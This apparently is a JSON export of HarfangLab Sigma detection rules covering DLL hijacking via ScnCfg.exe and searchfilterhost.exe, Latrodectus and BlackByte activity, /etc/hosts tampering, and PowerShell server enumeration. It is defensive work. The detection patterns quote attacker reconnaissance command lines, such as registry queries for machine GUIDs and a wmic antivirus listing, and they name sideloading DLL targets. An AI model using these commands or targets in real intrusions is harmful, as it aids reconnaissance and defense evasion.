"https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_scncfg.yml",
"content": "title: DLL Hijacking via ScnCfg.exe\nid: 4d7c9617-c2ec-4fad-be66-0d0804d9e122\ndescription: |\n Detects potential Windows DLL Hijacking via ScnCfg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate ScnCfg executable alongside a malicious vsodscpl.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n - https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessSignature: 'McAfee, Inc.'\n # ScnCfg.exe has no OriginalFileName\n ProcessDescription: 'VirusScan On-Demand Scan Task Properties'\n ImageLoaded|endswith: '\\vsodscpl.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d7c9617-c2ec-4fad-be66-0d0804d9e122",
"rule_name": "DLL Hijacking via ScnCfg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ScnCfg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate ScnCfg executable alongside a malicious vsodscpl.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d7e9eda-970d-4484-95fa-0f433f3355ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099014Z",
"creation_date": "2026-03-23T11:45:34.099016Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099021Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_searchfilterhost.yml",
"content": "title: DLL Hijacking via searchfilterhost.exe\nid: 4d7e9eda-970d-4484-95fa-0f433f3355ff\ndescription: |\n Detects potential Windows DLL Hijacking via searchfilterhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'searchfilterhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\TQUERY.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d7e9eda-970d-4484-95fa-0f433f3355ff",
"rule_name": "DLL Hijacking via searchfilterhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via searchfilterhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d861c32-4613-46cf-a560-20bad3598910",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592569Z",
"creation_date": "2026-03-23T11:45:34.592572Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592580Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitsight.com/blog/latrodectus-are-you-coming-back",
"https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus",
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_latrodectus_malware_activity.yml",
"content": "title: Latrodectus Malware Activity Detected\nid: 4d861c32-4613-46cf-a560-20bad3598910\ndescription: |\n Detects command-lines related to Latrodectus activity which are used to get detailed information about the hardware of the host.\n Latrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\n Is is recommended to investigate the parent process as well as the context around this alert to look for malicious actions.\nreferences:\n - https://www.bitsight.com/blog/latrodectus-are-you-coming-back\n - https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\n - https://attack.mitre.org/techniques/T1082/\ndate: 2025/07/10\nmodified: 2025/08/05\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Latrodectus\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '/c reg query HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\IDConfigDB\\Hardware Profiles\\0001 /v HwProfileGuid | findstr HwProfileGuid'\n - '/c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed'\n - '/c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid | findstr MachineGuid'\n\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d861c32-4613-46cf-a560-20bad3598910",
"rule_name": "Latrodectus Malware Activity Detected",
"rule_description": "Detects command-lines related to Latrodectus activity which are used to get detailed information about the hardware of the host.\nLatrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\nIs is recommended to investigate the parent process as well as the context around this alert to look for malicious actions.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2025-08-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4db7476a-88be-4716-891f-51278f296c69",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609507Z",
"creation_date": "2026-03-23T11:45:34.609510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609522Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://www.acronis.com/en-gb/cyber-protection-center/posts/blackbyte-30-uses-vulnerable-drivers-to-compromise-systems/",
"https://attack.mitre.org/techniques/T1486/",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1486_ransomware_blackbyte_executed.yml",
"content": "title: BlackByte Ransomware Executed\nid: 4db7476a-88be-4716-891f-51278f296c69\ndescription: |\n Detects the suspicious execution of svchost.exe with command-line arguments related to the BlackByte Ransomware.\n BlackByte injects its device encryption process into svchost.exe using the process hollowing method.\n BlackByte is also known have performed BYOVD (vulnerable drivers) techniques in order to disable security products.\n It is recommended to investigate any other alerts indicating malicious activity related to ransomware actors and to dump this process and analyze its contents to determine legitimacy.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://www.acronis.com/en-gb/cyber-protection-center/posts/blackbyte-30-uses-vulnerable-drivers-to-compromise-systems/\n - https://attack.mitre.org/techniques/T1486/\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2024/02/21\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - attack.impact\n - attack.t1486\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Ransomware.BlackByte\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '?:\\Windows\\System32\\svchost.exe -a ????????'\n - '?:\\Windows\\System32\\svchost.exe -w ????????'\n - '?:\\Windows\\System32\\svchost.exe -s ????????'\n ParentCommandLine|endswith:\n - ' -a ????????'\n - ' -w ????????'\n - ' -s ????????'\n - ' -a ???????? svc'\n - ' -w ???????? svc'\n - ' -s ???????? svc'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4db7476a-88be-4716-891f-51278f296c69",
"rule_name": "BlackByte Ransomware Executed",
"rule_description": "Detects the suspicious execution of svchost.exe with command-line arguments related to the BlackByte Ransomware.\nBlackByte injects its device encryption process into svchost.exe using the process hollowing method.\nBlackByte is also known have performed BYOVD (vulnerable drivers) techniques in order to disable security products.\nIt is recommended to investigate any other alerts indicating malicious activity related to ransomware actors and to dump this process and analyze its contents to determine legitimacy.\n",
"rule_creation_date": "2024-02-21",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1486"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4dbbc098-7309-4a0f-9571-5757305e0261",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.609270Z",
"creation_date": "2026-03-23T11:45:34.622116Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622121Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/"
],
"name": "t1562_etc_hosts_modified.yml",
"content": "title: Suspicious Modification of /etc/hosts\nid: 4dbbc098-7309-4a0f-9571-5757305e0261\ndescription: |\n Detects a suspicious attempt to modify /etc/hosts.\n This file is part of the network configuration and can be modified to falsify hosts resolution.\n It is recommended to ensure that the file has been modified by a legitimate process and that the new content is not malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1562/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/hosts'\n - TargetPath: '/etc/hosts'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_image:\n ProcessImage:\n - '/opt/f5/vpn/svpn'\n - '/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - '/opt/cisco/secureclient/bin/vpnagentd'\n - '/opt/cisco/anyconnect/bin/vpnagentd'\n - '/usr/bin/ln'\n - '/usr/bin/crio'\n - '/usr/lib/x86_64-linux-gnu/guix/guile'\n - '/gnu/store/*/bin/guile'\n - '/usr/bin/chown'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/usr/bin/pacman'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_reconfigure:\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessParentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains: '|/usr/bin/containerd|'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '/usr/bin/containerd-shim'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/lxc-start|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessAncestors|contains: '/usr/bin/podman'\n\n exclusion_aerohive:\n ProcessGrandparentProcessName: 'aerohive-config'\n ProcessCommandLine: 'cp -f /tmp/hosts.new /etc/hosts'\n\n # https://github.com/GoogleCloudPlatform/guest-configs/blob/master/src/usr/bin/google_set_hostname\n exclusion_googlecloud1:\n ProcessCommandLine: '/bin/sh /sbin/dhclient-script'\n ProcessParentImage: '/sbin/dhclient'\n\n exclusion_googlecloud2:\n ProcessCommandLine: 'sed -i /Added by Google/d /etc/hosts'\n ProcessParentCommandLine: '/bin/sh /sbin/dhclient-script'\n\n exclusion_veritas:\n ProcessCommandLine: '/usr/bin/python /opt/VRTScloudpoint/bin/flexsnap-agent.py'\n\n exclusion_proxmox:\n - ProcessCommandLine: 'pvedaemon'\n - ProcessAncestors|contains: '|/usr/libexec/proxmox/proxmox-termproxy|'\n\n exclusion_tee_append:\n ProcessImage: '/usr/bin/tee'\n ProcessCommandLine|startswith: 'tee -a '\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4dbbc098-7309-4a0f-9571-5757305e0261",
"rule_name": "Suspicious Modification of /etc/hosts",
"rule_description": "Detects a suspicious attempt to modify /etc/hosts.\nThis file is part of the network configuration and can be modified to falsify hosts resolution.\nIt is recommended to ensure that the file has been modified by a legitimate process and that the new content is not malicious.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e1fe352-a793-486e-8df4-20205d11b905",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627123Z",
"creation_date": "2026-03-23T11:45:34.627125Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627130Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_windows_servers_enumeration_powershell.yml",
"content": "title: Windows Servers Enumeration via PowerShell\nid: 4e1fe352-a793-486e-8df4-20205d11b905\ndescription: |\n Detects the use of PowerShell to enumerate computer objects in Active Directory related to Windows Server operating systems.\n This may indicate reconnaissance activity focused on identifying server assets for further compromise.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/07/10\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'DirectoryServices.DirectorySearcher'\n - 'objectCategory=Computer'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n - 'operatingsystem'\n - '-match'\n - 'Windows Server'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_dbatools:\n PowershellCommand|contains|all:\n - '### DO NOT EDIT THIS FILE DIRECTLY ###'\n - '#.ExternalHelp dbatools-Help.xml'\n - 'function Add-DbaAgDatabase {'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e1fe352-a793-486e-8df4-20205d11b905",
"rule_name": "Windows Servers Enumeration via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate computer objects in Active Directory related to Windows Server operating systems.\nThis may indicate reconnaissance activity focused on identifying server assets for further compromise.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e359ad0-b742-4cbb-b891-6e4324df0c1f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084466Z",
"creation_date": "2026-03-23T11:45:34.084468Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084472Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
